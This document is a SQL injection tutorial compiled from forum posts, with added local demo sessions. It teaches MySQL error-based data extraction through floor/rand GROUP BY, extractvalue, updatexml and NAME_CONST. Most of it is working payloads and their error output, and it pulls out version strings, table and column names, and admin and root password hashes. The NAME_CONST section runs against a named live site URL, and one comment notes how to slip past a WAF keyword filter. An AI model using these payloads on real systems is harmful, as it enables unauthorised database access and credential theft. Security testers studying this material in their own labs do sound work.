1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement forces an error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the duplicate-key error. This works because GROUP BY evaluates the key expression once when it looks the group up in its temporary table and again when it inserts a new group; rand(0) is seeded, so floor(rand(0)*2) yields the fixed sequence 0,1,1,0,1,1,... and, given at least three source rows, a lookup misses on 0 and the following insert collides on 1. The trailing 1 in the error is that floor() value; everything before it is the data. To read other data, replace version() with the desired subquery. For example, to read the admin password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2 (the three-row union supplies the source rows, so the payload does not need to read information_schema.tables):
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test payload (the XML functions exist from MySQL 5.1.5 onward):

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual run:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

The 0x5c (backslash) prefix makes the XPath expression invalid, and the error message echoes the invalid expression, data included. The message shows at most 32 characters of it, so longer values have to be read in pieces with substr().

3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual run:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
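Added example (not from the original post): one MySQL client session that reproduces all three error channels against a throwaway schema and then goes one step further than the page, paging a value longer than the 32-character XPath error window and stepping a LIMIT offset to walk rows. The errdemo database, the article and admin tables and their contents are constructed for this demo; only the payload shapes come from the page. Run it as a user who can create a database; every statement that carries data is expected to fail with the error noted in its comment, which is the whole point.

```sql
-- Added example, not code from the original post. The errdemo schema,
-- the admin row and its 41-character "hash" are constructed for the demo.
CREATE DATABASE IF NOT EXISTS errdemo;
USE errdemo;
CREATE TABLE article (id INT PRIMARY KEY, title VARCHAR(32), content VARCHAR(64));
CREATE TABLE admin   (id INT PRIMARY KEY, user VARCHAR(32), pass VARCHAR(64));
INSERT INTO article VALUES (1, 'test', 'do it');
INSERT INTO admin   VALUES (1, 'admin', '*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82');

-- 1. floor(rand(0)*2) + GROUP BY
--    Expected: ERROR 1062 Duplicate entry '*B7B1A4F45D9E638FAEB750F0A99935634CFF6C821' for key 'group_key'
--    The three-row UNION is the row source, so information_schema (a common
--    WAF keyword) never appears in the payload.
SELECT * FROM article WHERE id = 1
  AND (SELECT count(*) FROM (SELECT 1 UNION SELECT NULL UNION SELECT !1) x
       GROUP BY concat((SELECT pass FROM admin LIMIT 1), floor(rand(0)*2)));

-- 2. extractvalue(): the bad XPath string is echoed, but only its first
--    32 characters, so the 41-character hash is cut off.
--    Expected: ERROR 1105 XPATH syntax error: '\*B7B1A4F45D9E638FAEB750F0A99935'
SELECT * FROM article WHERE id = 1
  AND extractvalue(1, concat(0x5c, (SELECT pass FROM admin LIMIT 1)));
-- Page through it: the backslash uses one of the 32 slots, so 31 data
-- characters per request (chars 1-31, then 32-62).
SELECT * FROM article WHERE id = 1
  AND extractvalue(1, concat(0x5c, substr((SELECT pass FROM admin LIMIT 1), 1, 31)));
SELECT * FROM article WHERE id = 1
  AND extractvalue(1, concat(0x5c, substr((SELECT pass FROM admin LIMIT 1), 32, 31)));

-- 3. updatexml(): same 32-character window, same substr() fix.
--    Expected: ERROR 1105 XPATH syntax error: ':admin:*B7B1A4F45D9E638FAEB750F0'
SELECT * FROM article WHERE id = 1
  AND 1 = updatexml(1, concat(0x3a, (SELECT concat(user, 0x3a, pass) FROM admin LIMIT 1)), 1);

-- Walk a result set one row per request by stepping the LIMIT offset.
-- When the offset runs past the last row the subquery yields NULL,
-- concat() yields NULL, and the XPath error stops carrying data.
SELECT * FROM article WHERE id = 1
  AND extractvalue(1, concat(0x5c, (SELECT table_name FROM information_schema.tables
                                    WHERE table_schema = database() LIMIT 0,1)));
-- Expected: XPATH syntax error: '\admin'
SELECT * FROM article WHERE id = 1
  AND extractvalue(1, concat(0x5c, (SELECT table_name FROM information_schema.tables
                                    WHERE table_schema = database() LIMIT 1,1)));
-- Expected: XPATH syntax error: '\article'

DROP DATABASE errdemo;
```

The floor() vector needs three or more rows from whatever follows FROM; the XPath vectors need none, which is why they are usually the first choice on 5.1.5+ and why substr() paging matters as soon as the target is a password hash rather than a short name.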

More collected examples (NAME_CONST):

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection tricks for newer MySQL versions: injection via NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that. Later releases also enforce the documented rule that both arguments must be constants: a subquery, function call or @@variable as the first argument is rejected with ERROR 1210 "Incorrect arguments to NAME_CONST", so the technique works on some 5.0.x servers and not on others.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable. The second NAME_CONST produces a second column with the same name, and the resulting "Duplicate column name" error echoes the value that was used as the name.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

DATA = the subquery body to read. With a literal 1 we should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out of this thing...

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Step the offset (limit+1,1, limit+2,1, ...) to walk the remaining tables one per request.

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

0xHEX_OF_TABLENAME is the table name hex-encoded, which keeps quote characters out of the payload (0x75736572 is 'user', 0x6d7973716c is 'mysql'). So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

concat_ws(0x207e20, ...) joins the columns with " ~ " so both values come back in a single error. So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
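Added example (not part of the tutorial above or of the earlier collected snippets): the NAME_CONST duplicate-column trick run locally, end to end, in the order the tutorial follows (tables, then columns, then rows). The demo_app database and its members table are assumptions made for this example. The first statement is the check a tester wants before spending time on this vector: if the server rejects a non-constant first argument, neither payload shape can leak anything.

```sql
-- Added example, not code from the tutorial. demo_app and members are
-- constructed for this demo; the hash is the one quoted on the page.
CREATE DATABASE IF NOT EXISTS demo_app;
USE demo_app;
CREATE TABLE members (id INT PRIMARY KEY, login VARCHAR(32), pwd VARCHAR(64));
INSERT INTO members VALUES (1, 'root', '*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82');

-- Precondition check. Vulnerable 5.0.x servers return one column named
-- after the version string; patched servers fail here with
-- ERROR 1210 "Incorrect arguments to NAME_CONST" and nothing below works.
SELECT NAME_CONST(version(), 1);

-- Form 1 (the tutorial's): two identically named columns in one derived table.
-- Expected: ERROR 1060 Duplicate column name '<version string>'
SELECT * FROM (SELECT NAME_CONST(version(), 1), NAME_CONST(version(), 1)) AS x;

-- Form 2 (the join variant collected earlier on this page): two one-column
-- derived tables joined, then SELECT * over the join gives the same clash.
SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(@@version, 0)) a
               JOIN (SELECT NAME_CONST(@@version, 0)) b) c;

-- Tables: step LIMIT n,1 to walk them one per request.
-- Expected: Duplicate column name 'members'
SELECT * FROM (SELECT
  NAME_CONST((SELECT table_name FROM information_schema.tables
              WHERE table_schema = database() LIMIT 0,1), 1),
  NAME_CONST((SELECT table_name FROM information_schema.tables
              WHERE table_schema = database() LIMIT 0,1), 1)) AS x;

-- Columns: table name hex-encoded (0x6d656d62657273 = 'members') so the
-- payload needs no quotes; ORDER BY ordinal_position makes offsets stable.
-- Expected: Duplicate column name 'pwd'
SELECT * FROM (SELECT
  NAME_CONST((SELECT column_name FROM information_schema.columns
              WHERE table_name = 0x6d656d62657273 ORDER BY ordinal_position LIMIT 2,1), 1),
  NAME_CONST((SELECT column_name FROM information_schema.columns
              WHERE table_name = 0x6d656d62657273 ORDER BY ordinal_position LIMIT 2,1), 1)) AS x;

-- Rows: concat_ws(0x207e20, ...) = " ~ " separator, both fields in one error.
-- Expected: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
SELECT * FROM (SELECT
  NAME_CONST((SELECT concat_ws(0x207e20, login, pwd) FROM members LIMIT 0,1), 1),
  NAME_CONST((SELECT concat_ws(0x207e20, login, pwd) FROM members LIMIT 0,1), 1)) AS x;

DROP DATABASE demo_app;
```

Unlike the floor() and XPath vectors, this one depends on a server that still accepts expressions as a column name, so the precondition check at the top is worth a request of its own before automating the rest.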